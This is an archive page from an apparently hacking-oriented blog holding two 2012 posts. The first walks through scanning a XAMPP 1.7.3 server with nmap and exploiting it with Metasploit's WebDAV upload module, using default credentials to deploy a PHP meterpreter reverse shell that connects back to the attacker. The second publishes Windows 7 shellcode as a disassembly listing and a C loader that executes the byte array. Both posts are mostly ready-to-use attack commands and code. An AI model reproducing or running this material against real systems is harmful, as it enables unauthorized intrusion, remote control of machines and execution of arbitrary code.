Archive

Archive for the ‘Exploit’ Category

Exploit XMAPP With Metasploit Framework

Czerwiec 29, 2012 1 komentarz

XMAPP For Windows

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use – just download, extract and start.

The distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.

xampp_for_win

XAMPP For Windows

Nmap Scan:

root@bt:~# nmap -sS -T4 -A 192.168.235.1

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-28 11:52 EDT
Nmap scan report for 192.168.235.1
Host is up (0.00049s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title:             XAMPP            1.7.3
|_Requested resource was http://192.168.235.1/xampp/
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10 23:48:47
|_Not valid after:  2019-11-08 23:48:47
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
|_sslv2: server still supports SSLv2
| http-title:             XAMPP            1.7.3
|_Requested resource was https://192.168.235.1:443/xampp/

We can use XAMPP WebDAV PHP Upload exploit.

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Open msfconsole and type:

msf >use exploit(xampp_webdav_upload_php)

msf>set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf  exploit(xampp_webdav_upload_php) > show options

Module options (exploit/windows/http/xampp_webdav_upload_php):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
PATH      /webdav/         yes       The path to attempt to upload
Proxies                    no        Use a proxy chain
RHOST     192.168.235.1    yes       The target address
RPASS     xampp            yes       The Password to use for Authentication
RPORT     80               yes       The target port
RUSER     wampp            yes       The Username to use for Authentication
VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
LHOST  192.168.244.128  yes       The listen address
LPORT  4444             yes       The listen port

And exploit:

xampp exploit

Xampp Exploit

We’re home.

Source:

Win32/7 Ultimate mspaint.exe ShellCode

Czerwiec 8, 2012 Dodaj komentarz

win32/7 Ultimate mspaint.exe ShellCode

Author: Ayrbyte

Link : –

Version: – Category: Wi32/7

local Tested on: Windows 7 Ultimate

Code : c++

(diasembly code)

00403000   BB 449BB40E      MOV EBX,0EB49B44
00403005   33C9             XOR ECX,ECX
00403007   DBC4             FCMOVNB ST,ST(4)
00403009   B1 32            MOV CL,32
0040300B   D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
0040300F   5D               POP EBP
00403010   315D 13          XOR DWORD PTR SS:[EBP+13],EBX
00403013   83C5 04          ADD EBP,4
00403016   035D 0F          ADD EBX,DWORD PTR SS:[EBP+F]
00403019  -E2 B1            LOOPD SHORT msgbox.00402FCC
0040301B   67:5C            POP ESP
0040301D   8739             XCHG DWORD PTR DS:[ECX],EDI
0040301F   98               CWDE
00403020   9D               POPFD
00403021   F8               CLC
00403022   B0 7D            MOV AL,7D
00403024   AC               LODS BYTE PTR DS:[ESI]
00403025   2AA6 F69DFAAD    SUB AH,BYTE PTR DS:[ESI+ADFA9DF6]
0040302B   5B               POP EBX
0040302C   2E:70 E3         JO SHORT msgbox.00403012
0040302F   4F               DEC EDI
00403030   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
00403031   F4               HLT
00403032   2B7F 0E          SUB EDI,DWORD PTR DS:[EDI+E]
00403035   B2 0D            MOV DL,0D
00403037   4E               DEC ESI
00403038   8F               ???
00403039  -72 91            JB SHORT msgbox.00402FCC
0040303B   1C 53            SBB AL,53
0040303D   14 6D            ADC AL,6D
0040303F   5F               POP EDI
00403040   80F6 4C          XOR DH,4C
00403043   90               NOP
00403044   D5 F7            AAD 0F7
00403046   89CD             MOV EBP,ECX
00403048   16               PUSH SS
00403049   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
0040304A   42               INC EDX
0040304B   99               CDQ
0040304C   855A E7          TEST DWORD PTR DS:[EDX-19],EBX
0040304F   DF15 5A275425    FIST WORD PTR DS:[2554275A]
00403055   24 42            AND AL,42
00403057   AB               STOS DWORD PTR ES:[EDI]
00403058   D29E 4DFC4B94    RCR BYTE PTR DS:[ESI+944BFC4D],CL
0040305E   05 E4E0F2B5      ADD EAX,B5F2E0E4
00403063   15 24E1895C      ADC EAX,5C89E124
00403068   41               INC ECX
00403069   D27A 5F          SAR BYTE PTR DS:[EDX+5F],CL
0040306C   832A 83          SUB DWORD PTR DS:[EDX],-7D
0040306F   51               PUSH ECX
00403070  ^EB E1            JMP SHORT msgbox.00403053
00403072   BA 5DE6F8FB      MOV EDX,FBF8E65D
00403077   5A               POP EDX
00403078   198F F798A488    SBB DWORD PTR DS:[EDI+88A498F7],ECX
0040307E   CC               INT3
0040307F   E3 72            JECXZ SHORT msgbox.004030F3
00403081   1C D0            SBB AL,0D0
00403083   44               INC ESP
00403084   F0:8630          LOCK XCHG BYTE PTR DS:[EAX],DH
00403087  ^74 D5            JE SHORT msgbox.0040305E
00403089   51               PUSH ECX
0040308A   B3 7A            MOV BL,7A
0040308C   92               XCHG EAX,EDX
0040308D   16               PUSH SS
0040308E   9B               WAIT
0040308F   9E               SAHF
00403090   25 FA909BAE      AND EAX,AE9B90FA
00403095   FD               STD
00403096   76 2A            JBE SHORT msgbox.004030C2
00403098   F4               HLT
00403099   D952 76          FST DWORD PTR DS:[EDX+76]
0040309C   AE               SCAS BYTE PTR ES:[EDI]
0040309D   40               INC EAX
0040309E   C3               RETN
0040309F   D201             ROL BYTE PTR DS:[ECX],CL
004030A1   7C 13            JL SHORT msgbox.004030B6
004030A3   BA FED85829      MOV EDX,2958D8FE
004030A8   EA 5B0324ED EE3E JMP FAR 3EEE:ED24035B
004030AF   01ED             ADD EBP,EBP
004030B1   F0:40            LOCK INC EAX
004030B3   2286 C1CBADD1    AND AL,BYTE PTR DS:[ESI+D1ADCBC1]
004030B9   DD1E             FSTP QWORD PTR DS:[ESI]
004030BB   8A2E             MOV CH,BYTE PTR DS:[ESI]
004030BD   94               XCHG EAX,ESP
004030BE   02BB A671D7F9    ADD BH,BYTE PTR DS:[EBX+F9D771A6]
004030C4   AA               STOS BYTE PTR ES:[EDI]
004030C5   8102 3DD301A6    ADD DWORD PTR DS:[EDX],A601D33D
004030CB   BE 2019C3BB      MOV ESI,BBC31920
004030D0   6D               INS DWORD PTR ES:[EDI],DX
004030D1   9D               POPFD
004030D2   38B6 FE483E65    CMP BYTE PTR DS:[ESI+653E48FE],DH
004030D8   FE               ???
004030D9   58               POP EAX
004030DA   53               PUSH EBX
004030DB   FA               CLI
004030DC   70 02            JO SHORT msgbox.004030E0
004030DE   C2 9204          RETN 492
004030E1   C400             LES EAX,FWORD PTR DS:[EAX]

Exploit :

#include <windows.h>
char string[] =
"\xbb\x44\x9b\xb4\x0e\x33\xc9\xdb\xc4\xb1\x32\xd9\x74\x24\xf4\x5d\x31\x5d\x13\x83\xc5\x04\x03\x5d\x0f\xe2\xb1\x67\x5c\x87\x39\x98\x9d\xf8\xb0\x7d\xac\x2a\xa6\xf6\x9d\xfa\xad\x5b\x2e\x70\xe3\x4f\xa5\xf4\x2b\x7f\x0e\xb2\x0d\x4e\x8f\x72\x91\x1c\x53\x14\x6d\x5f\x80\xf6\x4c\x90\xd5\xf7\x89\xcd\x16\xa5\x42\x99\x85\x5a\xe7\xdf\x15\x5a\x27\x54\x25\x24\x42\xab\xd2\x9e\x4d\xfc\x4b\x94\x05\xe4\xe0\xf2\xb5\x15\x24\xe1\x89\x5c\x41\xd2\x7a\x5f\x83\x2a\x83\x51\xeb\xe1\xba\x5d\xe6\xf8\xfb\x5a\x19\x8f\xf7\x98\xa4\x88\xcc\xe3\x72\x1c\xd0\x44\xf0\x86\x30\x74\xd5\x51\xb3\x7a\x92\x16\x9b\x9e\x25\xfa\x90\x9b\xae\xfd\x76\x2a\xf4\xd9\x52\x76\xae\x40\xc3\xd2\x01\x7c\x13\xba\xfe\xd8\x58\x29\xea\x5b\x03\x24\xed\xee\x3e\x01\xed\xf0\x40\x22\x86\xc1\xcb\xad\xd1\xdd\x1e\x8a\x2e\x94\x02\xbb\xa6\x71\xd7\xf9\xaa\x81\x02\x3d\xd3\x01\xa6\xbe\x20\x19\xc3\xbb\x6d\x9d\x38\xb6\xfe\x48\x3e\x65\xfe\x58\x53\xfa\x70\x02\xc2\x92\x04\xc4";
int main()
{
  ((void (*)(void))string)();
}
Kategorie:Exploit Tags: